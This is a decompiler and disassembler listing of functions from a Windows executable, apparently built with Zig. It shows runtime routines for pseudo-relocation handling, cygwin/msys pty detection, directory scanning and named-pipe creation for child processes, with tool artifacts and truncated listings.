if (0x140057010 - 0x140057018 < 0xc) {
code_r0x0001400216be:
if ((*puVar13 == 0) && (puVar13[1] == 0)) {
puVar11 = auStack_58 + iVar9;
if (puVar13[2] != 1) {
code_r0x0001400218be:
0x14005d248 = puVar11;
*(puVar14 + -0x28) = 0x1400218ce;
sub_140021a60(" Unknown pseudo relocation protocol version %d.\u25d9");
pcVar6 = swi(3);
(*pcVar6)();
return;
}
puVar13 = puVar13 + 3;
puVar11 = auStack_58 + iVar9;
if (puVar13 < 0x140057010) {
do {
uVar1 = *(puVar13 + 2);
uVar2 = uVar1 - 8 >> 3;
uVar17 = uVar1 << 0x1d | uVar2;
puVar10 = puVar13[1] + iVar12;
switch(uVar17) {
case :
uVar19 = *puVar10;
uVar18 = uVar19 - 0x100;
bVar20 = *puVar10 < '\0';
break;
case :
uVar19 = *puVar10;
uVar18 = uVar19 - 0x10000;
bVar20 = *puVar10 < 0;
break;
:
goto code_r0x0001400218ae;
case :
uVar19 = *puVar10;
uVar18 = uVar19 - 0x100000000;
bVar20 = *puVar10 < 0;
break;
case :
uVar18 = *puVar10;
goto code_r0x00014002181f;
}
if (!bVar20) {
uVar18 = uVar19;
}
code_r0x00014002181f:
iStack_50 = (uVar18 - (*puVar13 + iVar12)) + *(*puVar13 + iVar12);
if ((uVar1 < 0x40) &&
((~(-1LL << (uVar1 & 0x3f)) < iStack_50 || (iStack_50 < -1LL << (uVar1 - 1 & 0x3f))))) {
puVar15 = auStack_88 + iVar9;
*(aiStack_80 + iVar9 + 0x18) = iStack_50;
*(&uStack_90 + iVar9) = 0x1400218ae;
sub_140021a60("%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.\u25d9", uVar1, puVar10);
code_r0x0001400218ae:
puVar14 = puVar15 + -0x20;
*(puVar15 + -0x28) = 0x1400218be;
sub_140021a60(" Unknown pseudo relocation bit size %d.\u25d9");
puVar11 = 0x14005d248;
goto code_r0x0001400218be;
}
if ((uVar17 < 8) && ((0x8bU >> (uVar2 & 0x1f) & 1) != 0)) {
uVar4 = *(uVar17 * 8 + 0x140056fd0);
*(aiStack_80 + iVar9) = 0x140021880;
sub_1400218cf(puVar10, &iStack_50, uVar4);
}
puVar13 = puVar13 + 3;
puVar11 = 0x14005d248;
} while (puVar13 < puVar7);
}
goto code_r0x00014002170f;
}
}
else if ((*0x140057018 == 0) && (0x140057018[1] == 0)) {
puVar13 = 0x140057018 + 3;
if (0x140057018[2] != 0) {
puVar13 = 0x140057018;
}
goto code_r0x0001400216be;
}
puVar11 = auStack_58 + iVar9;
if (puVar13 < 0x140057010) {
puRam000000014005d248 = auStack_58 + iVar9;
do {
uVar2 = puVar13[1];
iStack_44 = *puVar13 + *(uVar2 + iVar12);
*(aiStack_80 + iVar9) = 0x140021702;
sub_1400218cf(uVar2 + iVar12, &iStack_44, 4);
puVar13 = puVar13 + 2;
puVar11 = 0x14005d248;
} while (puVar13 < puVar7);
}
code_r0x00014002170f:
0x14005d248 = puVar11;
pcVar6 = kernel32.VirtualProtect;
if (0 < [0x0x14005d250]) {
iVar16 = 0x10;
iVar12 = 0;
puVar11 = 0x14005d248;
iVar8 = [0x0x14005d250];
do {
iVar3 = *(puVar11 + iVar16 + -0x10);
if (iVar3 != 0) {
uVar4 = *(puVar11 + iVar16 + -8);
uVar5 = *(puVar11 + iVar16);
*(aiStack_80 + iVar9) = 0x14002174f;
(*pcVar6)(uVar4, uVar5, iVar3, &iStack_50);
puVar11 = 0x14005d248;
iVar8 = [0x0x14005d250];
}
iVar12 = iVar12 + 1;
iVar16 = iVar16 + 0x28;
} while (iVar12 < iVar8);
}
return;
}
0x140017183 sub_140017183 str 3 api 0 imm 11 Unknown
sub_140017183() {
push rbp
push rsi
push rdi
push rbx
sub rsp, 0x278
lea rbp, [rsp+0x80]
mov rdi, [rcx]
mov dword ptr [rsp+0x20], 0x04
lea rdx, [rbp+0x1E0]
lea r8, [rbp+0x1F0]
push 0x08
pop r9
mov rcx, rdi
call jmp_ntdll.NtQueryVolumeInformationFile()
xor esi, esi
test eax, eax
jnz .3
cmp dword ptr [rbp+0x1F0], 0x11
jnz .3
xor esi, esi
lea rbx, [rbp-0x4C]
mov r8d, 0x20C
mov rcx, rbx
xor edx, edx
call sub_140021d8e()
mov dword ptr [rsp+0x20], 0x09
lea rdx, [rbp+0x1D0]
mov rcx, rdi
mov r8, rbx
mov r9d, 0x20C
call jmp_ntdll.NtQueryInformationFile()
test eax, eax
jnz .3
lea rax, [rbp-0x48]
mov ecx, [rax-0x04]
mov esi, ecx
shr esi, 0x01
test ecx, ecx
mov rdi, 0xAAAAAAAAAAAAAAAA
cmovnz rdi, rax
lea r8, ["\\msys-\\cygwin--pty"]
push 0x06
pop r9
mov rcx, rdi
mov rdx, rsi
call sub_14001b8d6()
test al, 0x01
jnz .1
lea r8, [0x1400250DC]
push 0x08
pop r9
mov rcx, rdi
mov rdx, rsi
call sub_14001b8d6()
test al, 0x01
jz .2
.1:
lea rax, [0x1400250EC]
mov [rsp+0x20], rax
mov qword ptr [rsp+0x28], 0x04
lea rbx, [rbp+0x1C0]
mov rcx, rbx
mov rdx, rdi
mov r8, rsi
xor r9d, r9d
call sub_14001e6bb()
cmp byte ptr [rbx+0x08], 0x00
setnz sil
jmp .3
.2:
xor esi, esi
.3:
mov eax, esi
add rsp, 0x278
pop rbx
pop rdi
pop rsi
pop rbp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
undefined4 sub_140017183(undefined8 *param_1)
{
undefined8 uVar1;
int32_t iVar2;
uint64_t uVar3;
uint32_t uVar4;
undefined4 uVar5;
undefined *puVar6;
undefined8 in_stack_fffffffffffffd88;
undefined8 uVar7;
undefined4 uVar8;
uint32_t uStack_264;
undefined auStack_260 [520];
undefined auStack_58 [8];
char cStack_50;
undefined auStack_48 [16];
undefined auStack_38 [16];
int32_t aiStack_28 [2];
uVar1 = *param_1;
uVar7 = CONCAT44(in_stack_fffffffffffffd88 >> 0x20, 4);
iVar2 = jmp_ntdll.NtQueryVolumeInformationFile(uVar1, auStack_38, aiStack_28, 8, uVar7);
uVar8 = uVar7 >> 0x20;
uVar5 = 0;
if ((iVar2 == 0) && (aiStack_28[0] == 0x11)) {
uVar5 = 0;
sub_140021d8e(&uStack_264, 0, 0x20c);
iVar2 = jmp_ntdll.NtQueryInformationFile(uVar1, auStack_48, &uStack_264, 0x20c, CONCAT44(uVar8, 9));
if (iVar2 == 0) {
uVar4 = uStack_264 >> 1;
puVar6 = 0xaaaaaaaaaaaaaaaa;
if (uStack_264 != 0) {
puVar6 = auStack_260;
}
uVar3 = sub_14001b8d6(puVar6, uVar4, "\\msys-\\cygwin--pty", 6);
if (((uVar3 & 1) == 0) && (uVar3 = sub_14001b8d6(puVar6, uVar4, 0x1400250dc, 8), (uVar3 & 1) == 0)) {
return 0;
}
sub_14001e6bb(auStack_58, puVar6, uVar4, 0, 0x1400250ec, 4);
uVar5 = CONCAT31(uStack_264 >> 9, cStack_50 != '\0');
}
}
return uVar5;
}
0x14001D3A4 sub_14001d3a4 str 2 api 0 imm 26 Unknown
sub_14001d3a4() {
push rbp
push r15
push r14
push r13
push r12
push rsi
push rdi
push rbx
mov eax, 0x209C8
call sub_140021d41()
sub rsp, rax
lea rbp, [rsp+0x80]
mov rdi, [r8+0x08]
test rdi, rdi
jz .2
mov r13, r9
mov r15, r8
mov rbx, rdx
mov r12, rcx
mov r14, [rdx+0x08]
mov rcx, rdx
mov rdx, r12
xor r8d, r8d
call sub_14001dd2a()
test ax, ax
jnz .30
mov r8, [rbx]
mov r9, [rbx+0x08]
dec r9
lea rsi, [rbp-0x28]
mov rcx, rsi
xor edx, edx
call sub_140017512()
movzx esi, word ptr [rsi+0x10008]
test si, si
jnz .31
lea rcx, [rbp+0xFFE8]
lea rdx, [rbp-0x28]
mov r8d, 0x10008
call sub_140021d71()
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov rax, [rax+0x48]
lea rdx, [rbp+0x208E0]
mov [rdx], rax
lea r8, [rbp+0xFFF0]
lea r9, [0x1400554F0]
lea rsi, [rbp+0x208D0]
mov rcx, rsi
call sub_1400188c9()
cmp word ptr [rsi+0x08], 0x00
mov [rbx+0x08], r14
mov si, 0x05
jz .4
.1:
mov [r15+0x08], rdi
jmp .3
.2:
mov si, 0x05
.3:
mov eax, esi
add rsp, 0x209C8
pop rbx
pop rdi
pop rsi
pop r12
pop r13
pop r14
pop r15
pop rbp
ret
.4:
mov rax, [rbp+0x208D0]
mov [rbp+0x20940], rax
mov rcx, r15
mov rdx, r12
mov r8w, 0x2A
call sub_14001dd2a()
test ax, ax
jnz .32
mov [rbp+0x208F8], r13
mov rcx, r15
mov [rbp+0x20910], r12
mov rdx, r12
xor r8d, r8d
call sub_14001dd2a()
test ax, ax
jnz .32
mov [rbp+0x20938], r14
mov [rbp+0x20930], rbx
mov rsi, [r15]
mov [rbp+0x20920], r15
mov rax, [r15+0x08]
and dword ptr [rbp+0x20918], 0x00
lea r13, [rax*2-0x02]
xor r15d, r15d
mov ebx, 0x800
lea r14, [rbp+0x2092E]
mov qword ptr [rbp+0x20908], 0x00
mov qword ptr [rbp+0x20900], 0x00
.5:
cmp r13, 0xFFFF
jnbe .9
mov [rbp+0x208E8], r13w
mov [rbp+0x208EA], r13w
mov [rbp+0x208F0], rsi
mov [rsp+0x50], r15b
lea rax, [rbp+0x208E8]
mov [rsp+0x48], rax
mov [rsp+0x40], r15b
lea rax, [rbp+0x1FFF0]
mov [rsp+0x28], rax
lea rax, [rbp+0x207F0]
mov [rsp+0x20], rax
mov dword ptr [rsp+0x38], 0x01
mov dword ptr [rsp+0x30], 0x800
mov rcx, [rbp+0x20940]
xor edx, edx
xor r8d, r8d
xor r9d, r9d
call jmp_ntdll.NtQueryDirectoryFile()
test eax, eax
jnz .8
xor r12d, r12d
.6:
cmp r12, 0x7FF
jnbe .5
mov rax, r12
mov ecx, [rbp+r12*1+0x1FFF0]
add r12, rcx
test rcx, rcx
cmovz r12, rbx
test byte ptr [rbp+rax*1+0x20028], 0x10
jnz .6
add rax, rbp
add rax, 0x1FFF0
mov r8d, [rax+0x3C]
shr r8d, 0x01
sub r8, rdi
jz .7
lea rdx, [rax+rdi*2]
add rdx, 0x40
mov rcx, r14
call sub_14001dd68()
cmp byte ptr [rbp+0x2092F], 0x00
jz .6
movzx eax, byte ptr [rbp+0x2092E]
and eax, 0x03
mov byte ptr [rbp+rax*1+0x20918], 0x01
mov al, 0x01
mov [rbp+0x20900], rax
jmp .6
.7:
mov al, 0x01
mov [rbp+0x20908], rax
jmp .6
.8:
cmp eax, 0x80000006
jz .12
cmp eax, 0xC000000F
mov r15, [rbp+0x20920]
mov rsi, [rbp+0x20930]
mov rbx, [rbp+0x20938]
jz .11
cmp eax, 0xC0000022
jnz .14
mov rcx, [rbp+0x20940]
call jmp_ntdll.NtClose()
mov [rsi+0x08], rbx
mov si, 0x1B
jmp .1
.9:
mov rcx, [rbp+0x20940]
call jmp_ntdll.NtClose()
mov rax, [rbp+0x20930]
mov rcx, [rbp+0x20938]
mov [rax+0x08], rcx
mov si, 0x06
.10:
mov r15, [rbp+0x20920]
jmp .1
.11:
mov rcx, [rbp+0x20940]
call jmp_ntdll.NtClose()
mov [rsi+0x08], rbx
mov si, 0x05
jmp .1
.12:
mov si, 0x05
test byte ptr [rbp+0x20908], 0x01
mov r15, [rbp+0x20920]
mov rbx, [rbp+0x20930]
mov r13, [rbp+0x20938]
jz .19
test r13, r13
jz .13
mov rax, [rbx]
mov rcx, [rbx+0x08]
movzx eax, word ptr [rax+rcx*2-0x02]
cmp eax, 0x2F
jz .13
cmp eax, 0x5C
jz .13
mov rcx, rbx
mov rdx, [rbp+0x20910]
mov r8w, 0x5C
call sub_14001dd2a()
test ax, ax
jnz .42
.13:
mov r8, [r15]
mov rcx, rbx
mov rsi, [rbp+0x20910]
mov rdx, rsi
mov r9, rdi
call sub_14001dea1()
test ax, ax
jnz .38
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
uint64_t sub_14001d3a4(undefined8 param_1,undefined8 *param_2,int64_t *param_3,undefined8 param_4)
{
uint8_t uVar1;
int16_t iVar2;
uint16_t uVar3;
uint64_t uVar4;
undefined8 uVar5;
int64_t *piVar6;
uint32_t uVar7;
int32_t iVar8;
int64_t iVar9;
int64_t iVar10;
int64_t iVar11;
int64_t iVar12;
undefined8 unaff_RSI;
uint64_t uVar13;
unkbyte6 Var14;
undefined8 uVar15;
uint64_t uVar16;
uint64_t uVar17;
undefined8 *puVar18;
undefined2 uVar19;
int64_t iVar20;
int64_t unaff_GS_OFFSET;
int64_t iStackX_8;
undefined auStackX_10 [8];
undefined auStackX_18 [16];
undefined8 uStack_48;
uStack_48 = 0x14001d3ba;
iVar9 = sub_140021d41();
iVar9 = -iVar9;
uVar4 = param_3[1];
if (uVar4 == 0) {
uVar13 = CONCAT62(unaff_RSI >> 0x10, 5);
goto code_r0x00014001d48c;
}
uVar15 = param_2[1];
*(&uStack_48 + iVar9) = 0x14001d3f0;
uVar7 = sub_14001dd2a(param_2, param_1, 0);
if (uVar7 == 0) {
uVar5 = *param_2;
iVar10 = param_2[1];
*(&uStack_48 + iVar9) = 0x14001d411;
sub_140017512(auStackX_18 + iVar9, 0, uVar5, iVar10 + -1);
uVar13 = *(&stack0x00010020 + iVar9);
if (*(&stack0x00010020 + iVar9) == 0) {
*(&uStack_48 + iVar9) = 0x14001d437;
sub_140021d71(&stack0x00010028 + iVar9, auStackX_18 + iVar9, 0x10008);
*(&stack0x00020920 + iVar9) = *(*(*(*(unaff_GS_OFFSET + 0x30) + 0x60) + 0x20) + 0x48);
*(&uStack_48 + iVar9) = 0x14001d473;
sub_1400188c9(&stack0x00020910 + iVar9, &stack0x00020920 + iVar9, &stack0x00010030 + iVar9, 0x1400554f0);
iVar2 = *(&stack0x00020918 + iVar9);
param_2[1] = uVar15;
uVar13 = CONCAT62(&stack0x00020910 + iVar9 >> 0x10, 5);
if (iVar2 == 0) {
*(&stack0x00020980 + iVar9) = *(&stack0x00020910 + iVar9);
*(&uStack_48 + iVar9) = 0x14001d4c0;
uVar7 = sub_14001dd2a(param_3, param_1, 0x2a);
if (uVar7 == 0) {
*(&stack0x00020938 + iVar9) = param_4;
*(&stack0x00020950 + iVar9) = param_1;
*(&uStack_48 + iVar9) = 0x14001d4e5;
uVar7 = sub_14001dd2a(param_3, param_1, 0);
if (uVar7 == 0) {
*(&stack0x00020978 + iVar9) = uVar15;
*(&stack0x00020970 + iVar9) = param_2;
iVar10 = *param_3;
*(&stack0x00020960 + iVar9) = param_3;
iVar11 = param_3[1];
*(&stack0x00020958 + iVar9) = 0;
uVar13 = iVar11 * 2 - 2;
*(&stack0x00020948 + iVar9) = 0;
*(&stack0x00020940 + iVar9) = 0;
while( true ) {
Var14 = iVar10 >> 0x10;
if (0xffff < uVar13) goto code_r0x00014001d68f;
uVar19 = uVar13;
*(&stack0x00020928 + iVar9) = uVar19;
*(&stack0x0002092a + iVar9) = uVar19;
*(&stack0x00020930 + iVar9) = iVar10;
auStackX_10[iVar9] = 0;
*(&iStackX_8 + iVar9) = &stack0x00020928 + iVar9;
auStackX_18[iVar9 + -0x18] = 0;
*(&stack0xffffffffffffffe8 + iVar9) = &stack0x00020030 + iVar9;
*(&stack0xffffffffffffffe0 + iVar9) = &stack0x00020830 + iVar9;
*(&stack0xfffffffffffffff8 + iVar9) = 1;
*(&stack0xfffffffffffffff0 + iVar9) = 0x800;
iVar11 = 0;
*(&uStack_48 + iVar9) = 0x14001d5b4;
iVar8 = jmp_ntdll.NtQueryDirectoryFile(*(&stack0x00020980 + iVar9), 0, 0, 0);
if (iVar8 != 0) break;
uVar17 = 0;
while (uVar16 = uVar17, uVar16 < 0x800) {
uVar17 = uVar16 + *(&stack0x00020030 + uVar16 + iVar9);
if (*(&stack0x00020030 + uVar16 + iVar9) == 0) {
uVar17 = 0x800;
}
if (((&stack0x00020068)[uVar16 + iVar9] & 0x10) == 0) {
if (*(&stack0x0002006c + uVar16 + iVar9) >> 1 == uVar4) {
*(&stack0x00020948 + iVar9) =
CONCAT71(&stack0x00020030 + uVar16 + iVar9 >> 8, 1);
}
else {
*(&uStack_48 + iVar9) = 0x14001d610;
sub_14001dd68(&stack0x0002096e + iVar9);
if ((&stack0x0002096f)[iVar9] != '\0') {
(&stack0x00020958)[((&stack0x0002096e)[iVar9] & 3) + iVar9] = 1;
*(&stack0x00020940 + iVar9) = 1;
}
}
}
}
}
if (iVar8 != -0x7ffffffa) {
param_3 = *(&stack0x00020960 + iVar9);
iVar10 = *(&stack0x00020970 + iVar9);
uVar15 = *(&stack0x00020978 + iVar9);
Var14 = iVar10 >> 0x10;
if (iVar8 == -0x3ffffff1) {
*(&uStack_48 + iVar9) = 0x14001d6c9;
jmp_ntdll.NtClose(*(&stack0x00020980 + iVar9));
*(iVar10 + 8) = uVar15;
uVar13 = CONCAT62(Var14, 5);
}
else if (iVar8 == -0x3fffffde) {
*(&uStack_48 + iVar9) = 0x14001d682;
jmp_ntdll.NtClose(*(&stack0x00020980 + iVar9));
*(iVar10 + 8) = uVar15;
uVar13 = CONCAT62(Var14, 0x1b);
}
else {
*(&uStack_48 + iVar9) = 0x14001d841;
jmp_ntdll.NtClose(*(&stack0x00020980 + iVar9));
*(iVar10 + 8) = uVar15;
uVar13 = CONCAT62(Var14, 0xf);
}
goto code_r0x00014001d482;
}
uVar13 = CONCAT62(Var14, 5);
param_3 = *(&stack0x00020960 + iVar9);
piVar6 = *(&stack0x00020970 + iVar9);
iVar10 = *(&stack0x00020978 + iVar9);
if (((&stack0x00020948)[iVar9] & 1) != 0) {
if (((iVar10 != 0) && (iVar2 = *(*piVar6 + -2 + piVar6[1] * 2), iVar2 != 0x2f)) &&
(iVar2 != 0x5c)) {
*(&uStack_48 + iVar9) = 0x14001d72b;
uVar7 = sub_14001dd2a(piVar6, *(&stack0x00020950 + iVar9), 0x5c);
if (uVar7 == 0) goto code_r0x00014001d734;
uVar13 = uVar7;
goto code_r0x00014001dcfc;
}
code_r0x00014001d734:
iVar11 = *param_3;
uVar15 = *(&stack0x00020950 + iVar9);
*(&uStack_48 + iVar9) = 0x14001d74c;
uVar7 = sub_14001dea1(piVar6, uVar15, iVar11, uVar4);
if (uVar7 != 0) {
uVar13 = uVar7;
*(&uStack_48 + iVar9) = 0x14001dcd0;
jmp_ntdll.NtClose(*(&stack0x00020980 + iVar9));
piVar6[1] = iVar10;
goto code_r0x00014001d482;
}
*(&uStack_48 + iVar9) = 0x14001d763;
uVar7 = sub_14001dd2a(piVar6, uVar15, 0);
if (uVar7 != 0) {
uVar13 = uVar7;
code_r0x00014001dcde:
*(&uStack_48 + iVar9) = 0x14001dcea;
jmp_ntdll.NtClose(*(&stack0x00020980 + iVar9));
piVar6[1] = *(&stack0x00020978 + iVar9);
goto code_r0x00014001d482;
}
iVar12 = *piVar6;
iVar10 = piVar6[1];
iVar11 = *param_3;
*(&uStack_48 + iVar9) = 0x14001d78b;
sub_14001def5(&stack0x00020900 + iVar9, iVar11, uVar4);
if ((&stack0x00020908)[iVar9] == '\0') {
code_r0x00014001d84e:
*(&uStack_48 + iVar9) = 0x14001d864;
sub_14001cdb0(&stack0x00020858 + iVar9, *(&stack0x000209f8 + iVar9));
uVar13 = *(&stack0x00020868 + iVar9);
iVar10 = *(&stack0x00020978 + iVar9);
if (*(&stack0x00020868 + iVar9) != 0) goto code_r0x00014001dcfc;
iVar11 = *(&stack0x00020858 + iVar9);
}
else {
*(&uStack_48 + iVar9) = 0x14001d7b7;
sub_14001dd68(&stack0x0002095e + iVar9, iVar11 + *(&stack0x00020900 + iVar9) * 2,
uVar4 - *(&stack0x00020900 + iVar9));
if (((&stack0x0002095f)[iVar9] == '\0') || (((&stack0x0002095e)[iVar9] & 2) != 0))
goto code_r0x00014001d84e;
uVar15 = *(&stack0x000209f8 + iVar9);
*(&uStack_48 + iVar9) = 0x14001d7f0;
sub_14001c971(&stack0x00020870 + iVar9, uVar15, iVar12, iVar10 + -1);
uVar13 = *(&stack0x00020880 + iVar9);
if (*(&stack0x00020880 + iVar9) != 0) goto code_r0x00014001dcde;
iVar11 = *(&stack0x00020870 + iVar9);
*(&uStack_48 + iVar9) = 0x14001d816;
sub_14001d0f9(&stack0x00020840 + iVar9, uVar15);
uVar13 = *(&stack0x00020850 + iVar9);
if (*(&stack0x00020850 + iVar9) != 0) {
*(&uStack_48 + iVar9) = 0x14001dd1d;
jmp_ntdll.NtClose(*(&stack0x00020980 + iVar9));
piVar6[1] = *(&stack0x00020978 + iVar9);
goto code_r0x00014001d482;
}
iVar12 = *(&stack0x00020840 + iVar9);
iVar10 = *(&stack0x00020978 + iVar9);
}
*(&stack0xffffffffffffffe8 + iVar9) = *(&stack0x00020a18 + iVar9);
*(&stack0xffffffffffffffe0 + iVar9) = *(&stack0x00020a10 + iVar9);
*(&uStack_48 + iVar9) = 0x14001d8b0;
uVar7 = sub_14001d2f8(iVar12, iVar11, *(&stack0x00020a00 + iVar9),
/* listing truncated */0x14001C7A9 sub_14001c7a9 str 2 api 0 imm 11 Unknown
sub_14001c7a9() {
push rbp
push r15
push r14
push r13
push r12
push rsi
push rdi
push rbx
sub rsp, 0x228
lea rbp, [rsp+0x80]
mov rax, gs:[0x30]
mov r13d, [rax+0x40]
push 0x01
pop r14
mov r15d, r14d
lock xadd [0x14005C018], r15d
mov rbx, r8
lea rax, [rbp-0x38]
lea rsi, [rbp+0x148]
mov [rsi], rax
mov qword ptr [rsi+0x08], 0x80
and qword ptr [rsi+0x10], 0x00
mov [rbp+0x1A0], rdx
mov rdi, rcx
lea rax, [rbp+0x198]
mov [rax], rsi
lea r12, [rbp+0x178]
mov [r12], rax
lea rax, [sub_140017ff5()]
mov [r12+0x08], rax
lea rdx, ["\\\\.\\pipe\\zig-childprocess--"]
push 0x1A
pop r8
mov rcx, r12
call sub_140017f82()
mov ecx, r13d
mov rdx, r12
call sub_140020653()
lea rdx, [0x140055812]
push 0x01
pop r13
mov rcx, r12
mov r8, r13
call sub_140017f82()
mov ecx, r15d
mov rdx, r12
call sub_140020653()
lea rdx, [0x140024BE7]
mov rcx, r12
mov r8, r13
call sub_140017f82()
mov r8, [rsi]
mov r9, [rsi+0x10]
dec r9
lea r15, [rbp+0x188]
lea r12, [rbp+0x48]
mov rcx, r15
mov rdx, r12
call sub_14001740a()
mov rax, [r15]
and word ptr [rbp+rax*2+0x48], 0x00
mov [rsp+0x38], rbx
mov eax, 0x1000
mov [rsp+0x28], eax
mov [rsp+0x20], eax
and dword ptr [rsp+0x30], 0x00
mov rcx, r12
mov edx, 0x40000001
xor r8d, r8d
mov r9d, r14d
call jmp_kernel32.CreateNamedPipeW()
cmp rax, 0xFFFFFFFFFFFFFFFF
jz .2
mov r14, rax
mov rax, [rbx+0x10]
lea r9, [rbp+0x160]
mov [r9+0x10], rax
movups xmm0, [rbx]
movaps [r9], xmm0
and qword ptr [rsp+0x30], 0x00
mov dword ptr [rsp+0x28], 0x80
mov dword ptr [rsp+0x20], 0x03
lea rcx, [rbp+0x48]
mov edx, 0x40000000
xor r8d, r8d
call jmp_kernel32.CreateFileW()
cmp rax, 0xFFFFFFFFFFFFFFFF
jz .1
mov r15, rax
mov rcx, r14
call sub_14001c74d()
test ax, ax
jnz .4
mov [rdi], r14
mov rax, [rbp+0x1A0]
mov [rax], r15
xor ebx, ebx
jmp .3
.1:
mov rcx, r14
call jmp_ntdll.NtClose()
.2:
mov bx, 0x0F
.3:
mov eax, ebx
add rsp, 0x228
pop rbx
pop rdi
pop rsi
pop r12
pop r13
pop r14
pop r15
pop rbp
ret
.4:
mov ebx, eax
mov rcx, r15
call jmp_ntdll.NtClose()
mov rcx, r14
call jmp_ntdll.NtClose()
jmp .3
}
/* DISPLAY WARNING: Type casts are NOT being printed */
uint64_t sub_14001c7a9(int64_t *param_1,int64_t *param_2,undefined4 *param_3)
{
undefined4 uVar1;
int32_t iVar2;
uint32_t uVar3;
int64_t iVar4;
int64_t iVar5;
uint64_t uVar6;
int64_t unaff_GS_OFFSET;
undefined8 in_stack_fffffffffffffdc8;
undefined auStack_220 [128];
undefined2 auStack_1a0 [128];
undefined *puStack_a0;
undefined8 uStack_98;
int64_t iStack_90;
undefined4 uStack_88;
undefined4 uStack_84;
undefined4 uStack_80;
undefined4 uStack_7c;
undefined8 uStack_78;
undefined ***pppuStack_70;
code *pcStack_68;
int64_t aiStack_60 [2];
undefined **ppuStack_50;
int64_t *piStack_48;
iVar2 = [0x0x14005c018];
uVar3 = in_stack_fffffffffffffdc8 >> 0x20;
uVar1 = *(*(unaff_GS_OFFSET + 0x30) + 0x40);
LOCK();
000000014005c018 = [0x0x14005c018] + 1;
UNLOCK();
puStack_a0 = auStack_220;
ppuStack_50 = &puStack_a0;
uStack_98 = 0x80;
iStack_90 = 0;
pppuStack_70 = &ppuStack_50;
pcStack_68 = sub_140017ff5;
piStack_48 = param_2;
sub_140017f82(&pppuStack_70, "\\\\.\\pipe\\zig-childprocess--", 0x1a);
sub_140020653(uVar1, &pppuStack_70);
sub_140017f82(&pppuStack_70, 0x140055812, 1);
sub_140020653(iVar2, &pppuStack_70);
sub_140017f82(&pppuStack_70, 0x140024be7, 1);
sub_14001740a(aiStack_60, auStack_1a0, puStack_a0, iStack_90 + -1);
auStack_1a0[aiStack_60[0]] = 0;
iVar4 = jmp_kernel32.CreateNamedPipeW(auStack_1a0, 0x40000001, 0, 1, 0x1000, 0x1000, uVar3 << 0x20, param_3);
if (iVar4 != -1) {
uStack_78 = *(param_3 + 4);
uStack_88 = *param_3;
uStack_84 = param_3[1];
uStack_80 = param_3[2];
uStack_7c = param_3[3];
iVar5 = jmp_kernel32.CreateFileW(auStack_1a0, 0x40000000, 0, &uStack_88, 3, 0x80, 0);
if (iVar5 != -1) {
uVar3 = sub_14001c74d(iVar4);
if (uVar3 == 0) {
*param_1 = iVar4;
*piStack_48 = iVar5;
uVar6 = 0;
}
else {
uVar6 = uVar3;
jmp_ntdll.NtClose(iVar5);
jmp_ntdll.NtClose(iVar4);
}
goto code_r0x00014001c947;
}
jmp_ntdll.NtClose(iVar4);
}
uVar6 = CONCAT62(param_3 >> 0x10, 0xf);
code_r0x00014001c947:
return uVar6 & 0xffffffff;
}
No library functions identified.